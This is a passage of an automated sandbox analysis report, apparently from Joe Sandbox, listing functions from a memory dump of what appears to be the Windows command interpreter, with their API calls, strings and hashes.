                                                                            • Instruction ID: 021e528ce5d199cf8b6302d082d1f7c0f744f5d5853a161f4bec7b8df6727ef3
                                                                            • Opcode Fuzzy Hash: 6e6019b845ee32e49b4b797e5b7754e60a385c0f2496fde0869c02c6f16fe61b
                                                                            • Instruction Fuzzy Hash: 7281D276A002249BDB14ABB4EC496FEBBF9EF0A710F1501A9F809E72D0DB3199418765
                                                                            Function 00B0790C Relevance: 28.7, APIs: 19, Instructions: 208COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B09A11: _get_osfhandle.MSVCRT ref: 00B09A1C
                                                                              • Part of subcall function 00B09A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B0793A,00000104,?), ref: 00B09A2B
                                                                              • Part of subcall function 00B09A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A47
                                                                              • Part of subcall function 00B09A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A56
                                                                              • Part of subcall function 00B09A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A61
                                                                              • Part of subcall function 00B09A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A6A
                                                                            • _get_osfhandle.MSVCRT ref: 00B07943
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B07951
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00B40AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 00B079BE
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00B07A1C
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B07A27
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                            • String ID:
                                                                            • API String ID: 2173784998-0
                                                                            • Opcode ID: adaf878e29ed19dd62242dd0280a7ec1fcbf1f1d016a40e216ebf0a56c8d4741
                                                                            • Instruction ID: 0db4afadc9ce2dfbe0207e0a020e226a5df9794621c833900a853d29aa433726
                                                                            • Opcode Fuzzy Hash: adaf878e29ed19dd62242dd0280a7ec1fcbf1f1d016a40e216ebf0a56c8d4741
                                                                            • Instruction Fuzzy Hash: 67717F75E44218AFDB149FA5DC88AAEBBF9FF45311F10406AE906E3250DF30AA40CB91
                                                                            Function 00B22859 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00B22931
                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00B22998
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentFormatMessageThread
                                                                            • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                            • API String ID: 2411632146-3173542853
                                                                            • Opcode ID: e417b97f6ef77d0c42d02b888d741601b45a9f57d08cf0c1c5f402f5ad0fea51
                                                                            • Instruction ID: 1e17206e4c4457381462006afa9c2e1437c6b190b364975251ceb5e66acff634
                                                                            • Opcode Fuzzy Hash: e417b97f6ef77d0c42d02b888d741601b45a9f57d08cf0c1c5f402f5ad0fea51
                                                                            • Instruction Fuzzy Hash: AB51E271900324BADB345F29AC49E6BBAF8EF49B00F0045EDF549D25A1DA75EAC0CF21
                                                                            Function 00B10590 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 181fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00B1B7DB,0000000C,00000004,00000080,00000000), ref: 00B105FF
                                                                            • _open_osfhandle.MSVCRT ref: 00B10613
                                                                            • _wcsicmp.MSVCRT ref: 00B10663
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00B10695
                                                                            • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00B106D3
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00B106FB
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00B10717
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00B1E89D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                            • String ID: con
                                                                            • API String ID: 58404892-4257191772
                                                                            • Opcode ID: fa9f8468264a1db6128efb23952e90c773b37c8d07787549d31079229ffc565e
                                                                            • Instruction ID: b3baff7ad52911930c89a189d5ebecf71661fea5d82a91c8cb7fce97cfa64ecf
                                                                            • Opcode Fuzzy Hash: fa9f8468264a1db6128efb23952e90c773b37c8d07787549d31079229ffc565e
                                                                            • Instruction Fuzzy Hash: EA51EA70A50104ABDB10AF54DC85BEEB7F9FB55720FA04259F921E32D0DBB58EC18B61
                                                                            Function 00B2C5F2 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2C62E
                                                                            • memset.MSVCRT ref: 00B2C656
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00B2C6C7
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00B2C6E6
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00B2C72A
                                                                            • _wcsicmp.MSVCRT ref: 00B2C747
                                                                            • _wcsicmp.MSVCRT ref: 00B2C76C
                                                                            • _wcsicmp.MSVCRT ref: 00B2C794
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 00B2C7B3
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 00B2C7C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                            • String ID: CSVFS$NTFS$REFS
                                                                            • API String ID: 3510147486-2605508654
                                                                            • Opcode ID: 9c940697c285e6d980cabc7d475bd710a4865e55f67863114e44c5afacd759c7
                                                                            • Instruction ID: c6857d8171e115d23115b915856cd9b265c27170ea3d6998baa5ce518cd1af1d
                                                                            • Opcode Fuzzy Hash: 9c940697c285e6d980cabc7d475bd710a4865e55f67863114e44c5afacd759c7
                                                                            • Instruction Fuzzy Hash: C1514FB1A002296ADB20CA65EC89AEFBFF8EB55344F0400D9E509E3151EB34DE84CE65
                                                                            Function 00B09789 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                            • API String ID: 2081463915-3124875276
                                                                            • Opcode ID: 7ca7c47d6f747e63fb40b176ab130c5bf702858115a57820b871f1ac80002679
                                                                            • Instruction ID: 4fae005a937915a0a7634b2f1552d2cf2c247d8e91c92858255f8f2fbd44533b
                                                                            • Opcode Fuzzy Hash: 7ca7c47d6f747e63fb40b176ab130c5bf702858115a57820b871f1ac80002679
                                                                            • Instruction Fuzzy Hash: 05412B31244302DAE7286B14E85977A3FE4FB537A4B2485EED102862D2EFB68844C312
                                                                            Function 00B156C4 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 297COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • longjmp.MSVCRT(00B40A70,000000FF,00000000,?,00000001,?,?,?,00B15833,?, /D /c",?,?,?,00000000,?), ref: 00B21271
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: longjmp
                                                                            • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                            • API String ID: 1832741078-366822981
                                                                            • Opcode ID: 880ba6008eff2e1ddea057051d506b32689c1402a119c082009fcc7106cbd382
                                                                            • Instruction ID: 7e24ab7073dec571aaaa67bc64f2e0c971ccc7164c5e455d6c9bdaadf9a89035
                                                                            • Opcode Fuzzy Hash: 880ba6008eff2e1ddea057051d506b32689c1402a119c082009fcc7106cbd382
                                                                            • Instruction Fuzzy Hash: 13A1D270600628FBCF24DF58D58A9AE7BE6FBA4794B6084D5F40A476D0CB70DE91CB81
                                                                            Function 00B07E93 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 146windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00B40AF0,00002000,00000000,00000000,00000000,00000000), ref: 00B07ED4
                                                                              • Part of subcall function 00B0A62F: wcschr.MSVCRT ref: 00B0A635
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00B40AF0,00002000,?), ref: 00B07F16
                                                                            • _ultoa.MSVCRT ref: 00B1AFC9
                                                                            • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00B1AFDE
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00B1AFF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                            • String ID: Application$System
                                                                            • API String ID: 3538039442-3455788185
                                                                            • Opcode ID: de64376500716818c53203d4f6e7e22e7797ca71803182d03cd2b9aeb525bb55
                                                                            • Instruction ID: f464301be21419c78baf47f4669620ec2f34515e6f0dd23d9eefd237706a1bba
                                                                            • Opcode Fuzzy Hash: de64376500716818c53203d4f6e7e22e7797ca71803182d03cd2b9aeb525bb55
                                                                            • Instruction Fuzzy Hash: FD41EA71B813056BEB109B64CC89FAFBBEDEB46750F500069F606EB1C0DA70AE41C751
                                                                            Function 00B0E950 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 276COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcschr$_wcsicmpiswspace
                                                                            • String ID: :.\$=,;$=,;+/[] "
                                                                            • API String ID: 1913572127-843887632
                                                                            • Opcode ID: a090e09db789ed6e5a4560af5efc7c9f757a64ba3b909e8c481bc5fd457be915
                                                                            • Instruction ID: 4b01af54e6959d5fd4c92230c974cfc2be6027edd347dd33caa5ef46e26955b6
                                                                            • Opcode Fuzzy Hash: a090e09db789ed6e5a4560af5efc7c9f757a64ba3b909e8c481bc5fd457be915
                                                                            • Instruction Fuzzy Hash: 86A1C231A042149BDB24CB69D8C8BBA7BF0FF48314F5409E9E826A72D1DB70DE85CB51
                                                                            Function 00B253AA Relevance: 18.2, APIs: 12, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B09E8E: iswspace.MSVCRT ref: 00B09E9E
                                                                            • wcsrchr.MSVCRT ref: 00B25406
                                                                            • wcschr.MSVCRT ref: 00B2541C
                                                                            • wcsrchr.MSVCRT ref: 00B2544C
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00B2546B
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B2547B
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B25497
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00B2549F
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B254B3
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00B254D4
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00B25501
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B25557
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00B25578
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                            • String ID:
                                                                            • API String ID: 4166807220-0
                                                                            • Opcode ID: ed0e4eb515932302214a0e990928dc2da4a82b312d1508a27591d675dccf9317
                                                                            • Instruction ID: 64343d46341ebc70d433d1a3361bd598f6f33321a52a72c9db186b6e60a137c2
                                                                            • Opcode Fuzzy Hash: ed0e4eb515932302214a0e990928dc2da4a82b312d1508a27591d675dccf9317
                                                                            • Instruction Fuzzy Hash: E35185756002249ADB34AB34EC497E977E9FF11310F1484E9E49AD31D1EF709E85CB91
                                                                            Function 00B07610 Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00B07669
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B07670
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00B07686
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B0768D
                                                                            • _wcsicmp.MSVCRT ref: 00B07719
                                                                            • _wcsicmp.MSVCRT ref: 00B0772B
                                                                            • _wcsicmp.MSVCRT ref: 00B07758
                                                                            • _wcsicmp.MSVCRT ref: 00B1AA79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap_wcsicmp$AllocProcess
                                                                            • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                            • API String ID: 435930816-3086019870
                                                                            • Opcode ID: a416e8de661e37839010150d8bf36c623f237d8d83f6982403d089e252f489ac
                                                                            • Instruction ID: 26a492697d28f5e7257ca2cf51e4e7ba7e8f011f7ede20b12600c00d8021d4bb
                                                                            • Opcode Fuzzy Hash: a416e8de661e37839010150d8bf36c623f237d8d83f6982403d089e252f489ac
                                                                            • Instruction Fuzzy Hash: 68512635A49201AFE714DF38AC4596A7BD8FF05354B6484EDE942C72D2EF21EC01CB66
                                                                            Function 00B2AEBD Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2AF04
                                                                            • memset.MSVCRT ref: 00B2AF2E
                                                                            • memset.MSVCRT ref: 00B2AF58
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,00B0250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 00B2B08B
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00B2B095
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 00B2B0AA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00B2B1DA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00B2B1F2
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00B2B20A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ErrorLast$InformationVolume
                                                                            • String ID: %04X-%04X
                                                                            • API String ID: 2748242238-1126166780
                                                                            • Opcode ID: bd1f0b67087983e8cd4c7de3549436cf7db82176e92336e36e323cd44a8c0ac0
                                                                            • Instruction ID: 9f02af4f7c18b1a99fd9bc779d2b159258f9b2cfb8f183e76bf623cfaf3fd16d
                                                                            • Opcode Fuzzy Hash: bd1f0b67087983e8cd4c7de3549436cf7db82176e92336e36e323cd44a8c0ac0
                                                                            • Instruction Fuzzy Hash: 3A91AEB1A002289BDB25DB24DC95EEBB7F8EF14304F4005E9E50DE3181EF349E848B95
                                                                            Function 00B0BC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspace
                                                                            • String ID: =,;
                                                                            • API String ID: 3458554142-1539845467
                                                                            • Opcode ID: c125865ccd515ad1e42f0cb5926586564d3e8c21aecb3c28763c0d0c8a818cee
                                                                            • Instruction ID: 4da21aba3ab1ee3818dcee4df0b90745a40a9882a87c3066e35c1eb8b1dfdcb5
                                                                            • Opcode Fuzzy Hash: c125865ccd515ad1e42f0cb5926586564d3e8c21aecb3c28763c0d0c8a818cee
                                                                            • Instruction Fuzzy Hash: 9F81BD749002168BEB349F64CC45BBABBF5EF10345F1448FAE94AA72C1EB748D84CB61
                                                                            Function 00B123F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B12431
                                                                            • memset.MSVCRT ref: 00B12452
                                                                            • memset.MSVCRT ref: 00B1247C
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00B0250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 00B12585
                                                                            • _wcsicmp.MSVCRT ref: 00B125A3
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00B125CA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00B125E3
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00B1F32B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$InformationVolume_wcsicmp
                                                                            • String ID: FAT
                                                                            • API String ID: 4247940253-238207945
                                                                            • Opcode ID: 5c93d7678e8eede4d5737dde644f7d25d576fcc5fa7f3eae365f8a424e094939
                                                                            • Instruction ID: 177f78c7b9692fff69e9da7bb0a90b98bc9af8d94d0ddfd28b6a8de1e147a07c
